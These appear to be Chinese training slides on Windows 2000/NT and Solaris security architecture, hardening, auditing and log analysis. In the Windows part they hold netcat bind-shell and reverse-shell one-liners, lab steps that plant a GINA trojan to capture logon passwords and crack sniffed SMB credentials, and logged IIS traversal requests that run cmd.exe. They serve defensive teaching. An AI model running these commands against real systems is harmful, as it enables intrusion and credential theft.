課程目的了解win2K系統的設計原理了解Win2K的安全特性能夠對win2K系統進行安全配置授課方式：講解、演示、學員實際操作中國科學院計算技術研究所教育中心趙鳳偉制作了解日常選擇的安裝分區是什么？是否關默認服務是否采用默認安裝對win2K是否配置過本地安全策略為什么要介紹windowsNT安全WindowsNT體系構架WindowsNT安全基礎WindowsNT日常安全配置WindowsNT的審計分析為什么要介紹windowsNT的安全系統安全評測標準系統面臨很多威脅黑客攻擊手段系統漏洞導致的損失系統安全評測標準1985年，美國國防部公布《可信計算機系統評估準則》（TCSEC）即桔皮書

TCSEC安全等級

安全級別描述D最低的級別。如MS-DOS計算機，沒有安全性可言C1靈活的安全保護。系統不需要區分用戶。可提供根本的訪問控制。C2靈活的訪問安全性。系統不僅要識別用戶還要考慮唯一性。系統級的保護主要存在于資源、數據、文件和操作上。NT屬于C2級的系統B1標記安全保護。系統提供更多的保護措施包括各式的安全級別。如AT＆T的SYSTEMV和UNIXwithMLS以及IBMMVS/ESAB2結構化保護。支持硬件保護。內容區被虛擬分割并嚴格保護。如TrustedXENIXandHoneywellMULTICSB3安全域。提出數據隱藏和分層，阻止層之間的交互。如HoneywellXTS-200A校驗級設計。需要嚴格的準確的證明系統不會被危害，而且提供所有低級別的因素。如HoneywellSCOMP基于C2級標準的安全組件 靈活的訪問控制WindowsNT支持C2級標準要求的靈活訪問控制。要求包括允許對象的屬主能夠完全控制誰可以訪問這個對象及什么樣的訪問權限。 對象再利用WindowsNT很明確地阻止所有的應用程序不可訪問被另一應用程序使用所占用資源內的信息（比如內存或磁盤）。這種安全面貌是NT沒有能力恢復已在磁盤上刪除的文件的主要原因。 強制登陸與WindowsforWorkgroups、Windows95和98不同，WindowsNT用戶在能訪問任何資源前必須通過登陸來驗證他們的身份。這也是另一個原因缺乏這種強制登陸的NT要想達到以前的C2級的標準就必須禁止網絡功能。 審計因為WindowsNT采用單獨地機制來控制對任何資源的訪問，所以這種機制可以集中地記錄下所有的訪問活動。 控制對象的訪問WindowsNT不允許直接訪問系統里的資源，這種不許直接訪問是允許訪問控制的關鍵。在允許訪問之前，用戶或應用程序的權限首先被驗證被攻擊的前幾種操作系統MicrosoftWindows31663000UNIX22544605CISCOIOS7821832被攻擊最多的通用WEB服務器被攻擊的產品占有用戶的百分比被攻擊的次數MicrosoftIIS41.0617797201ApacheGroupApache10.6212602NetscapeEnterpriseServer9.074892IplanetE-commerceSolution0.13124造成的損失2003-8-15全球受沖擊波里蠕蟲感染的機器超過34萬臺。8月1日下午微軟公司網站被黑，一個多小時無法訪問。為什么要介紹windowsNT安全WindowsNT體系統構架WindowsNT安全基礎WindowsNT安全日常配置WindowsNT的審計分析WindowsNT體系統構架服務管理器服務進程系統支持進程本地安全驗證服務Windows登錄會話管理器應用程序環境子系統Svchost.exeWinmgmt.exeSpoolerServices.exe任務管理器Windows瀏覽器用戶級應用程序子系統動態鏈接庫OS/2POSIXWin32系統服務調度進程核心可調用接口I/O設備管理器設備、文件驅動程序文件系統緩存管理器即插即用設備管理器虛擬內存管理器進程和線程注冊表配置管理器NTdll.dllWin32UserGDI圖形驅動HALMicrokernel為什么要介紹windowsNT安全WindowsNT體系構架WindowsNT安全基礎WindowsNT安全日常配置WindowsNT的審計分析windowsNT安全模型LogonprocessSAMUserAccountDatabaseSecurityPolicyDatabaseLSAAuditlogWin32applicationWin32subsystemSecurityReferenceMonitorUsermodeKernelmodeSecuritypolicyAuditmessageWindowsNT安全子系統WinlogonGINALocalSecurityAuthority(LSA)AuthenticationPackagesSecuritySupportProvidersSecurityAccountManagerNetlogonSSPI安全的要素安全帳戶管理器安全標識符SID標識了用戶、組和計算機的唯一性，不僅僅是在某臺特定的電腦上還包括和其它計算機交互的時候。為了確保SID的唯一性，它們是綜合計算機名字、當前時間、以及處理當前用戶模式線程所花費CPU的時間所建立起來的。S-1-5-16349933112989372637-500安全訪問令牌安全描述符訪問控制列表進程地址空間系統地址空間線程線程線程進程和線程什么是進程？代表了運行程序的一個實例每一個進程有一個私有的內存地址空間什么是線程？進程內的一個執行上下文進程內的所有線程共享相同的進程地址空間每一個進程啟動時帶有一個線程運行程序的“主”函數可以在同一個進程中創建其他的線程可以創建額外的進程系統進程基本的系統進程smss.exeSessionManagercsrss.exe

子系統服務器進程winlogon.exe

管理用戶登錄services.exe

包含很多系統服務lsass.exe

管理IP安全策略以及啟動ISAKMP/Oakley(IKE)和IP安全驅動程序。(系統服務)產生會話密鑰以及授予用于交互式客戶/服務器驗證的服務憑據(ticket)。(系統服務)svchost.exe

包含很多系統服務，檢查注冊表中的位置來構建需要

加載的服務列表SPOOLSV.EXE將文件加載到內存中以便遲后打印。(系統服務)explorer.exe

資源管理器internat.exe

托盤區的拼音圖標

系統進程樹smss.exe

對話管理器

第一個創建的進程

引入參數

HKLM\System\CurrentControlSet\Control\SessionManager

裝入所需的子系統(csrss)，然后winlogoncsrss.exe Win32子系統winlogon.exe

登錄進程：裝入services.exe和lsass.exe

顯示登錄對話框（“鍵入CTRL+ALT+DEL，登錄）當有人登入，運行在HKLM\Software\Microsoft\WindowsNT\WinLogon\Userinit

中的進程（通常只是userinit.exe)services.exe服務控制器：也是幾項服務的出發點Svchost.exe

服務的開始進程不是services.exe的一部分

(由HKLM\System\CurrentControlSet\Services驅動)lsass.exe

本地安全驗證服務器（打開SAM）userinit.exe

登陸之后啟動。啟動外殼（通常是Explorer.exe—見

HKLM\Software\Microsoft\

WindowsNT\CurrentVersion\WinLogon\Shell)

裝入配置文件，恢復驅動器標識符映象，然后退出（因此，瀏覽器單獨顯示）

explorer.exe

和它的孩子是所有交互式應用的創建者

附加的系統進程?mstask.exe

允許程序在指定時間運行。(系統服務)?regsvc.exe

regsvc.exe

允許遠程注冊表操作。(系統服務)?winmgmt.exe

提供系統管理信息(系統服務)。?inetinfo.exe

通過Internet信息服務的管理單元提供信息服務連接和管理。(系統服務)?tlntsvr.exe

允許遠程用戶登錄到系統并且使用命令行運行控制臺。(系統服務)?termsrv.exe

提供多會話環境允許客戶端設備訪問虛擬的Windows2000Professional桌面會話以及運行在服務器上的桌面會話基于Windows的程序。(系統服務)?dns.exe

應答對域名系統(DNS)名稱的查詢和更新請求。(系統服務)試驗（一）用ntsd

結束正常無法結束的進程Ntsd–cq–ppid試驗（二）使用listdlls

分析winlogon進程模塊信息配置devel5插入winlogon

同時測試結果用listdlls

查看winlogon是否多了wshtcpip.dll用fc命令比較兩次不用輸出結果Unlocker

強制刪除木馬文件Ftype

修復系統關聯文件試驗（三）使用listdlls

分析winlogon進程模塊信息植入msgina木馬用listdlls

查看winlogon的gina

是否正常查看被劫持的登陸密碼Ssdt

木馬分析Win32KernelRootkitsmodifythebehaviourofthesystembyKernelNativeAPIhooking.ThistechniqueistypicallyimplementedbymodifyingtheServiceTableentriesintheServiceDescriptorTable(SDT).Suchmodificationensuresthatareplacement(hook)functioninstalledbyarootkitiscalledpriortotheoriginalnativeAPI.ThereplacementfunctionusuallycallstheoriginalnativeAPIandmodifiestheoutputbeforereturningtheresultstotheuser-spaceprogram.Thistechniqueallowskernelrootkitstohidefiles,processes,andtopreventprocesstermination在user-space和systemservice之間是通過相應的dllsexportapi實現的例1writedatatoanopenfile

由kernel32.dllwritefile

api

wirtefile

api在內核層由zwwritefilenativeapithatisexportedbyntdll.dll

在內核層通過中斷技術實現zwwritefile1-MOVEAX,0ED2-LEAEDX,DWORDPTRSS:[ESP+4]3-INT2E4-RETN24注：0EDistheservicenumberofthezwwritefile

ItwillbeusedtooffsetintotheServiceTable(SystemServiceDispatchTable)inkernel-spacetolocatetheaddressofthefunctionthatimplementsthewritefileservice

ServiceDescriptorTabletypedef

struct

ServiceDescriptorTable{ SDEServiceDescriptor[4];}SDT;typedef

struct

ServiceDescriptorEntry{PDWORDServiceTable;PDWORDCounterTableBase;DWORDServiceLimit;PBYTEArgumentTable;}SDE;ServiceTable

的值就是指向zwwritefile

whichcontainstheactualcodetowritetofilesProcessHidingbyHookingZwQuerySystemInformation

UseruseToolHelpAPIstoobtainalistofallrunningprocessesToolhepAPIcallZWQUERYSYSTEMINFORMATIONexportedbyntdll.dllinkernelmodeHackermodifythefunctionpointerinservicetable(ZWQUERYSYSTEMINFORMATION)toareplacementfunctionThereplacementfunctionfirstcallstheoriginalZwQuerySystemInformationAPItoobtainanarraycontaininginformationofallrunningprocess.Thereturnedarrayisthenmodifiedtoremovetheentrycontainingtheprocesstobehidden.Finally,themodifiedresultisreturnedtotheuser-spaceprogram.Thiseffectivelypreventstheuser-spaceprogramfrom"seeing"thehiddenprocess.sdtrestoreC:\>sdtrestoreSDTrestoreVersion0.1Proof-of-ConceptbySIG^2G-TEC(.sg)KeServiceDescriptorTable8046DFA0KeServiceDecriptorTable.ServiceTable804742B8KeServiceDescriptorTable.ServiceLimit248ZwAllocateVirtualMemory10--[hookedbyunknownatF754CE74]--ZwCreateFile20--[hookedbyunknownatF754CA85]--ZwCreateKey23--[hookedbyunknownatF754CC5E]--ZwCreateProcess29--[hookedbyunknownatF754CDB7]--ZwDeleteFile34--[hookedbyunknownatF754C80C]--ZwGetTickCount4C--[hookedbyunknownatF754CE27]--ZwLoadDriver55--[hookedbyunknownatF754CBF2]--ZwQueryDirectoryFile7D--[hookedbyunknownatF754C6E8]--ZwQuerySystemInformation97--[hookedbyunknownatF754C623]--ZwSetInformationFileC2--[hookedbyunknownatF754C8A8]--NumberofServiceTableentrieshooked=10WARNING:THISISEXPERIMENTALCODE.FIXINGTHESDTMAYHAVEGRAVECONSEQUENCES,SUCHASSYSTEMCRASH,DATALOSSORSYSTEMCORRUPTION.PROCEEDATYOUROWNRISK.YOUHAVEBEENWARNED.FixSDTEntries(Y/N)?:y[+]PatchedSDTentry10to804A257F[+]PatchedSDTentry20to80497EF9[+]PatchedSDTentry23to804B2483[+]PatchedSDTentry29to804A9212[+]PatchedSDTentry34to804D0584[+]PatchedSDTentry4Cto80463FF2[+]PatchedSDTentry55to8052DC72[+]PatchedSDTentry7Dto80498541[+]PatchedSDTentry97to80493B5B[+]PatchedSDTentryC2to80498C08試驗1iceswordtoviewsdt

2usesdtrestoretorestorethesdtWin2K服務基礎TCP/IP端口與服務NetBios協議RPC服務公共互連網絡文件系統（CIFS）練習：1、查看端口與服務對應文件2、查看默認開放端口TCP/IP端口與服務nc-nvv192.168.x.x80連到192.168.x.x的TCP80端口nc-l-p80監聽本機的TCP80端口nc-l-p5354-t-ec:\winnt\system32\cmd.exe遠程主機端口與shell的綁定nc-t-ec:\winnt\system32\cmd.exe192.168.x.x5354綁定REMOTE主機的CMDSHELL并反向連接到192.168.x.x的TCP5354端口nc-nvv192.168.x.x80<c:\exploit.txt輸送溢出代碼到遠程主機的80端口Smb與CifsSMB一種客戶機/服務器、請求/響應協議。通過SMB協議，客戶端應用程序可以在各種網絡環境下讀、寫服務器上的文件，以及對服務器程序提出服務請求。此外通過SMB協議，應用程序可以訪問遠程服務器端的文件、以及打印機、郵件槽（mailslot）、命名管道（namedpipe）等資源Smb協議MicrosoftnetworkLanmanagerNtlmNtlmv2試驗1通過網上鄰居共享訪問一個主機用cain截獲smb通訊Sendtocracker.破解用戶名與密碼試驗2用redbutton測試smb通訊的安全性Keylogger

木馬為什么要介紹windowsNT安全WindowsNT體系構架WindowsNT安全基礎WindowsNT日常安全配置WindowsNT的審計分析Win2K服務win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護帳號和口令安全SAMSyskey帳號和口令策略帳號和口令策略***在賬戶策略->密碼策略中設定：

密碼復雜性要求啟用

密碼長度最小值個人機8位，服務器10位以上

強制密碼歷史5次

最長存留期30天

***在賬戶策略->賬戶鎖定策略中設定：

賬戶鎖定3次錯誤登錄

鎖定時間20分鐘

復位鎖定計數20分鐘

練習帳號和口令安全更改超級管理帳戶名稱取消guest帳號禁止某些帳號從本地或遠程登錄新建一名為administrator的普通帳號為用戶合理地分配權限練習用戶權限Administrators組Users組PowerUsers組BackupOperators組win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護文件系統安全Windows2000支持NTFS文件系統、文件分配表(FAT)和FAT32。NTFSFATFAT32運行Windows2000的計算機可以訪問NTFS分區上的文件。運行帶有ServicePack4或更高版本的WindowsNT4.0計算機可能可以訪問某些文件。其他操作系統則無法訪問。可以通過MS-DOS、所有版本的Windows、WindowsNT、Windows2000和OS/2訪問。只能通過Windows95OSR2、Windows98和Windows2000訪問。NTFS與FAT分區權限FAT32NTFSNTFS分區特點特殊權限所有者控制繼承性移動/復制影響共享權限磁盤配額文件權限權限控制原則和特點1>權限是累計2>拒絕的權限要比允許的權限高3>文件權限比文件夾權限高4>利用用戶組來進行權限控制5>權限的最小化原則win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護本地安全策略--本地策略審核策略：決定記錄在計算機（成功/失敗的嘗試）的安全日志上的安全事件。用戶權利分配：決定在計算機上有登錄/任務特權的用戶或組。安全選項：啟用或禁用計算機的安全設置，例如數據的數字信號、administrator和guest的帳號名、軟驅和光盤的訪問、驅動程序的安裝以及登錄提示。win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護Regedit與Regedt32的區別regeditregedt32使用較新的Windows9x/me用戶界面使用較早的windows3.1用戶界面可搜索：鍵名、值名、值內容只能搜索鍵名可以搜索并編輯遠程注冊表可以搜索并編輯遠程注冊表在一個窗口中顯示整個注冊表對每一控制項顯示各自的窗口可以導出、導入文本文件可以導出但不能導入文本文件不能導出或導入二進制文件可以導出并導入二進制文件不能提供“只讀”模式提供“只讀”模式，但不作為缺省形式不提供安全特性支持完整的WindowsNT/2000訪問控制和審計存放在winnt文件夾里存放在winnt\system32文件里只完全支持Windows9x/me注冊表數據類型（字符串、二進制、DWORD）支持全部WindowsNT/2000注冊表數據類型/字符串、二進制、DWORD、多字符串、可擴展字符串、資源描述刪除默認網絡共享服務器:Key:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersName:AutoShareServerType:DWORDValue:0工作站：Key:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersName:AutoShareWksType:DWORDValue:0練習1、去除默認共享2、刪除IE啟動主頁3、刪除IE的主頁修改限制注冊表權限試驗1通過regedt32修改run的訪問權限2在run下添加或修改響應鍵值，看看結果安全模版與分析工具默認工作站(basicwk.inf)默認服務器(basicsv.inf)默認域控制器(basicdc.inf)兼容工作站或服務器(compatws.inf)安全工作站或服務器(securews.inf)高度安全工作站或服務器(hisecws.inf)專用域控制器(dedicadc.inf)安全域控制器(securedc.inf)高度安全域控制器(hisecdc.inf)

練習：做一個適合普通辦公用機的安全模版，將其導出。模板配置試驗通過mmc打開安全模板和安全配置分析修改一個模板如securews

另存為一新模板在安全配置與分析打開一數據庫，輸入名字，導入新建模板查看系統配置win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護其它安全配置組策略EFS加密文件系統IIS安全IE安全EFS加密文件系統特性：1、采用單一密鑰技術2、核心文件加密技術僅用于NTFS，使用戶在本地計算機上安全存儲數據3、加密用戶使用透明，其他用戶被拒4、不能加密壓縮的和系統文件，加密后不能被共享、能被刪除建議加密文件夾，不要加密單獨的文件EFS恢復代理故障恢復代理就是獲得授權解密由其他用戶加密的數據的管理員必須進行數據恢復時，恢復代理可以從安全的存儲位置獲得數據恢復證書導入系統。默認的超級管理員就是恢復代理使用條件：當加密密鑰丟失練習：1、用一個名為test的普通用戶將文件aa.txt加密2、使用一個名為張三的在管理員組帳號打開3、使用系統默認的超級管理員打開IIS的安全配置

安裝IIS注意事項

Web站點主目錄目錄安全性練習SSL安全機制

SSL（加密套接字協議層）位于HTTP層和TCP層之間，建立用戶與服務器之間的加密通信，確保所傳遞信息的安全性。使用SSL安全機制時，首先客戶端與服務器建立連接，服務器把它的數字證書與公共密鑰一并發送給客戶端，客戶端隨機生成會話密鑰，用從服務器得到的公共密鑰對會話密鑰進行加密，并把會話密鑰在網絡上傳遞給服務器，而會話密鑰只有在服務器端用私人密鑰才能解密，這樣，客戶端和服務器端就建立了一個唯一的安全通道。安裝IIS注意事項選擇安裝組件INTERNET服務管理器INTERNET服務管理器（HTML）WORLDWIDEWEB服務器公用文件文檔文件傳輸（FTP）服務器避免安裝在主域控制器上刪除inetpub下的scripts目錄IIS工具ToolIISLockTool具有以下功能和特點：?幫助管理員設置

IIS安全性；?此工具可以在4IIS4和

IIS5上使用；?幫助管理員去掉對本網站不必要的一些服務，使

IIS在滿足本網站需求的情況下運行最少的服務下載地址?http:///default.aspx?scid=kb;en-us;309508IE的安全設置常規安全內容高級win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護日常異常檢測異常端口檢測異常進程檢測異常啟動項檢測異常程序檢測練習：1、異常端口檢測2、檢測異常啟動程序和進程MBSAMicrosoftBaselineSecurityAnalyzer從MBSA主頁下載MBSA：/technet/security/tools/mbsahome.mspx

部署SUShttp:///fwlink/?LinkId=6930

日常維護--備份和還原數據將文件備份到文件或磁帶備份“系統狀態”數據使用備份向導備份文件計劃備份將文件備份到MicrosoftExchange為什么要介紹windowsNT安全WindowsNT體系構架WindowsNT安全基礎WindowsNT日常安全配置WindowsNT的審計分析安全審核與日志

訪問文件夾的審核審核策略安全事件查看并分析審計成功：可以確定用戶或服務獲得訪問指定文件、打印機或其他對象的頻率審計失敗：警告那些可能發生的安全泄漏windowsNT日志系統日志

跟蹤各種各樣的系統事件，比如跟蹤系統啟動過程中的事件或者硬件和控制器的故障。

應用程序日志

跟蹤應用程序關聯的事件，比如應用程序產生的象裝載DLL（動態鏈接庫）失敗的信息將出現在日志中。安全日志

跟蹤事件如登錄上網、下網、改變訪問權限以及系統啟動和關閉。注意：安全日志的默認狀態是關閉的。日志Internet信息服務

FTP日志默認位置：%systemroot%/system32logfiles/msftpsvc1默認每天一個日志Internet信息服務WWW日志默認位置：：%systemroot%/system32/logfiles/w3svc1，默認每天一個日志FTP日志和WWW日志文件名通常為ex（年份）（月份）（日期），例如ex001023就是2000年10月23日產生的日志，用記事本就可直接打開Scheduler服務日志默認位置：%systemroot%/schedlgu.txt日志分析FTP日志分析，如下例：#Software:MicrosoftInternetInformationServices5.0（微軟IIS5.0）#Version:1.0（版本1.0）#Date:2000102303:11:55（服務啟動時間日期）03:11:55[1]USERadministator-331（IP地址為

用戶名為administator

試圖登錄）03:11:58[1]PASS-530（登錄失敗）03:12:04[1]USERnt-331（

IP地址為

用戶名為

nt的用戶試圖登錄）03:12:06[1]PASS-530（登錄失敗）03:12:32[1]USERadministrator-331（（

IP地址為

用戶名為administrator試圖登錄）03:12:34[1]PASS230（登錄成功）（登錄成功）03:12:41[1]MKDnt550（新建目錄失敗）03:12:45[1]QUIT550（退出FTP程序）日志分析http日志#Software:MicrosoftInternetInformationServices5.0#Version:1.0#Date:2003-08-1105:30:32#Fields:datetimec-ip

cs-usernames-ips-portcs-methodcs-uri-stem

cs-uri-querysc-statuscs(User-Agent)2003-08-1105:30:3243-4380GET/scripts/..%5c..%5cwinnt/system32/cmd.exe/c+dir+c:\200Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)2003-08-1107:24:0143-4380GET/scripts/..%5c..%5cwinnt/system32/cmd.exe/c+copy%20c:\winnt\system32\cmd.exe%20venus.exe502Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)2003-08-2003:00:3543-4380GET/<Rejected-By-UrlScan>~/scripts/..%c1%af../winnt/system32/cmd.exe404-總結為什么要介紹windowsNT安全WindowsNT體系構架WindowsNT安全基礎WindowsNT日常安全配置WindowsNT的審計分析課程目的掌握Solaris系統的安全配置掌握Solaris系統的異常分析及審計授課方式：講解、演示、學員上機操作

本課程操作、實驗環境：Solaris_9_x86Solaris系統安全Solaris系統安全配置Solaris系統審計分析Solaris系統安全配置Solaris系統基本安裝配置帳號和口令安全文件系統安全其它安全配置網絡服務安全異常檢測和維護Solaris系統安裝不安裝多余組件停止不必要的服務打最新的補丁設置aset關閉無用端口編輯/etc/inet/inetd.conf文件，注釋調無用的端口。（保留Telnet、Xwindows端口）參照/etc/inet/services文件中的端口。查看服務對應的端口Solaris基本配置關閉無用端口/etc/rc3.dS34dhcp

S76snmpdx

S80mipagent

S15nfs.server

S50apache

S77dmi將大寫的S改為小寫xSolaris基本配置/etc/rc2.d

S70uucp

S71ldap.client

S72autoinstall

S73cachefs.daemon

S73nfs.client

S74autofs

S74xntpd

S80lp

S94Wnn6

將大寫的S改為小寫x如果想關閉Xwindows將S71rpc、S99dtlogin

改名Solaris基本配置Solaris補丁安裝Showrev

－p顯示安裝補丁版本信息Solaris補丁分類Point

Cluster

補丁下載地址：/pub-cgi/show.pl?target=patches/patch-access&nav=patchpageSolaris系統安全配置asetSecuritylevelstasksReportsAsetfilesConfigurationSecuritylevelsLowMediumhightasksSystemfilespermissionsverficationSystemfilescheckUser/groupcheckSystemconfigurationfilescheckEnvironmentcheckEepromcheckFirewallsetupReports/usr/aset/reports

/usr/aset/aset–n通過郵件把報表發送給其他人AsetfilesMasterfilesTunefilesUid_aliasesfilesChecklistfilesEnvironmentfilesConfigurationChoosewhichtaskstorunSpecifydirectoriesforchecklisttasksScheduleexecutionSolaris系統安全配置Solaris系統基本安裝配置帳號和口令安全文件系統安全其它安全配置網絡服務安全禁用和刪除不必要的帳號sys、uucp、nuucp、listen、lp、adm簡單的辦法是在/etc/shadow的password域前加NP。Passwd

－luser1刪除賬號#userdeluser1Solaris系統帳號安全練習8、9Solaris系統帳號安全強迫用戶修改密碼

passwd–fusername禁止用戶修改密碼

Passwd–n10–x7username設置用戶的期限Useradd–e12/25/99username

Solaris系統帳號安全創建var/adm/loginlog

記錄登陸過程設置chmod600/var/adm/loginlogChownsys/var/adm/loginlogRoot帳號安全性確保root只允許從控制臺登陸限制知道root口令的人數使用強壯的密碼三個月或者當有人離開公司是就更改一次密碼使用普通用戶登陸,用su取得root權限,而不是以root身份登錄Solaris系統帳號安全Root帳號安全性設置umask

為077,在需要時再改回022請使用全路徑執行命令不要允許有非root用戶可寫的目錄存在root的路徑里Solaris9系統默認禁止root只能從console登陸Solaris系統帳號安全監控用戶su過程在/etc/default/su里Uncomment

sulog=/var/adm/sulogconsole=/dev/console用的su過程可以在控制臺上顯示禁止root用戶遠程登錄編輯/etc/default/login文件，添加 CONSOLE=/dev/null禁止root遠程FTP登錄在/etc/ftpusers里加上root。在SSH

配置文件加：permitRootLogin

=

noSolaris系統帳號安全Solaris系統帳號安全記錄用戶未成功登陸系統的日志

/var/adm/loginlog?touch/var/adm/loginlog限制登陸shell/usr/lib/rsh

用戶被限制在自己的目錄下用戶只能使用PATH路徑下的命令不能使用重定向輸出符Solaris帳號口令安全設置密碼策略編輯“/etc/default/passwd”

修改MAXWEEKS=4

口令至少每隔4星期更改一次

修改MINWEEKS=1口令至多每隔1星期更改一次

添加WARNWEEKS=3修改口令后第三個星期會收到快要修改口令的信息

修改PASSLENGTH=6用戶口令長度不少于6個字符實驗4Solaris帳號口令安全設置sysadmin組口令刪除sysadmin組內不重要用戶禁用User用戶練習Solaris系統安全配置Solaris系統基本安裝配置帳號和口令安全文件系統安全其它安全配置網絡服務安全ls–altestdrwxr-xr-x3rootroot1024Sep1311:58test模式位通常由一列10個字符來表示，每個字符表示一個模式設置1:表示文件類型。d表示目錄，-表示普通文件，l表示鏈接文件等等

每個文件和目錄有三組權限，一組是文件的擁有者、一組是文件所屬組的成員、一組是其他所有用戶。

"r"表示可讀，"w"表示可寫，"x"表示可執行。一共9位(每組3位)，合起來稱為模式位(modebits)Solaris文件系統的安全Solaris文件系統的安全Chmod

改變文檔或目錄之屬性。如#chmod755testChown改變文檔或目錄之擁有權#chownuser1file1;chown-Ruser1dir1Chgrp改變文檔或目錄之群組擁有權

#chgrp

group1

file1Solaris文件系統的安全SUID/SGIDSUID表示"設置用戶ID“;SGID表示"設置組ID"。當用戶執行一個SUID文件時，用戶ID在程序運行過程中被置為文件擁有者的用戶ID。如果文件屬于root，那用戶就成為超級用戶。SUID程序代表了重要的安全漏洞，特別是SUID設為root的程序。Solaris文件系統的安全SUID/SGID

#find/-perm-4000-ls

find列出所有設置了SUID（“4000”）或SGID（“2000”）位的普通文件（“f”）。

chmoda-s<文件名>”移去相應文件的“s”位。實驗6Solaris文件系統的安全設置系統的粘貼位

chmod1755files

ls–l/var/mail

drwxrwxrwt…….MailSolaris文件系統的安全限制/etc下文件的使用

find/etc/-typef–perm–g+w–print(查找組可寫文件）

find/etc/-typef–perm–o+w–print

（查找其他用戶可寫文件）

chmod–Rgo-w/etc

（改變任何錯誤的組/其他用戶的寫權限）

Solaris文件系統的安全加密文件

cryptkey<clearfile>encryptedfilecryptkey<encryptedfile

Solaris文件系統安全備份命令cp—雖然常用來拷貝單獨一個文件，但cp（copy）命令支持一個遞歸選項（-R）來拷貝一個目錄和它里面所有的文件和子目錄。例如把mydir中所有內容拷貝到mydir2中：cp-Rmydirmydir2。tar—tar（TApe

aRchiver）命令可以創建、把文件添加到或從一個tar檔案（或“tar文件”）中解開文件。cpio—這個SVR4和GNU工具把文件拷貝進或拷貝出一個cpio或tar檔案。與tar相似。

練習找出系統中的setuid,setgid,sticky文件Solaris系統安全配置Solaris系統基本安裝配置帳號和口令安全文件系統安全其它安全配置網絡服務安全日常異常檢測和維護系統資源的監控進程內存磁盤進程結構ProcessKernelthreadUserlwp查看進程Ps–ef

Ps–ecl

進程的優先級別Real-timeSystemprocessesTimesharingprocessesInteractiveprocesses修改進程的優先級別Nice(nice+4or-10command)Priocntl

priocntl–e–cRT–t500–p20結束重啟進程KillpidKill-9pidKill-HUPpid系統性能檢測Sac/usr/bin/sacSadc/usr/lib/sa/sadc系統性能檢測VmstatIostat–xtcDf

網絡性能監測PingSpraySnoopNetstatnfsstat啟動網絡參數設定設置/etc/init.d/inetinit文件在系統作為路由器的情況中執行

#ndd–set/dev/ip

ip_forwarding1關閉數據包轉發

#ndd–set/dev/ip

ip_forwarding0(或/etc/notrouter)忽略重定向數據包（否則有遭到DOS的隱患）

#ndd–set/dev/ip

ip_ignore_redirects1

不發送重定向數據包

#ndd–set/dev/ip

ip_send_redirects0禁止轉發定向廣播

#ndd–set/dev/ip

ip_forward_directed_broadcasts0禁止轉發在數據源設置了路由的數據包

#ndd–set/dev/ip

ip_forward_src_routed0啟動網絡參數設定ICMP協議參數設置/etc/init.d/inetinit文件關閉響應echo廣播

＃ndd–set/dev/ip

ip_respond_to_echo_boadcast0關閉響應時間戳廣播

#ndd–set/dev/ip

ip_respond_to_timestamp_broadcast0關閉地址掩碼廣播

#ndd–set/dev/ip

ip_respind_to_address_mask_broadcast0ARP攻擊防止減少過期時間#ndd–set/dev/arp

arp_cleanup_interval60000#ndd-set/dev/ip

ip_ire_flush_interval60000默認是300000毫秒（5分鐘）加快過期時間，并不能避免攻擊，但是使得攻擊更加困難，帶來的影響是在網絡中會大量的出現ARP請求和回復請不要在繁忙的網絡上使用。ARP攻擊防止建立靜態ARP使用arp–ffilename加載如下文件

08:00:20:ba:a1:f2

08:00:20:ee:de:1f

這是一種很有效的方法，而且對系統影響不大。缺點是破壞了動態ARP協議禁止ARPifconfiginterface–arp

網卡不會發送ARP和接受ARP包。但是使用前提是使用靜態的ARP表，如果不在apr表中的計算機，將不能通信TCP協議參數Synflood（半開式連接攻擊）SYNFLOOD原理 請求方

服務方

>

發送

SYN消息

回應

SYN-ACK

<

>

ACK

ndd–set/dev/tcptcp_conn_req_max_q04096默認連接數為1024連接耗盡攻擊ndd–set/dev/tcp

tcp_conn_req_max_q1024默認連接數為128防止TCP序列號預測攻擊(ip欺騙)建議在/etc/default/inetinit中增加如下的生成初始化序列號設置來防止TCP序列號預測攻擊(ip欺騙):TCP_STRONG_ISS=2

TCP協議參數堆棧緩沖區溢出禁止堆棧緩沖區溢出在/etc/system里加上如下語句，禁止緩沖溢出：

echo

"set

noexec_user_stack=1"

>>

/etc/system

echo

"set

noexec_user_stack_log=1"

>>

/etc/system

Solaris系統安全配置Solaris系統基本安裝配置帳號和口令安全文件系統安全其它安全配置網絡服務安全日常異常檢測和維護Solaris系統及網絡服務/etc/inet/inetd.conf/etc/inet/inetd.conf決定inetd啟動網絡服務時，啟動哪些服務，用什么命令啟動這些服務，以及這些服務的相關信息

/etc/service/etc/services文件記錄一些常用的接口及其所提供的服務的對應關系。

/etc/protocols/etc/protocols文件記錄協議名及其端口的關系。/etc/Rc*.d/etc/inittab

inittab定義了系統缺省運行級別，系統進入新運行級別需要做什么Inetd服務#more/etc/inetd.conf#systatstreamtcp

nowaitroot/usr/bin/ps

ps-ef#系統進程監控服務，允許遠程察看進程#netstatstreamtcp

nowaitroot/usr/bin/netstat

netstat-finet#網絡狀態監控服務，允許遠程察看網絡狀態#timestreamtcp6nowaitrootinternal#timedgramudp6waitrootinternal#網絡時間服務，允許遠程察看系統時間#echostreamtcp6nowaitrootinternal#echodgramudp6waitrootinternal#網絡測試服務，回顯字符串Inetd服務#namedgram

udpwaitroot/usr/sbin/in.tnamed

in.tnamed#named，DNS服務器#telnetstreamtcp6nowaitroot/usr/sbin/in.telnetd

in.telnetd#telnet服務器#ftpstreamtcp6nowaitroot/usr/sbin/in.ftpd

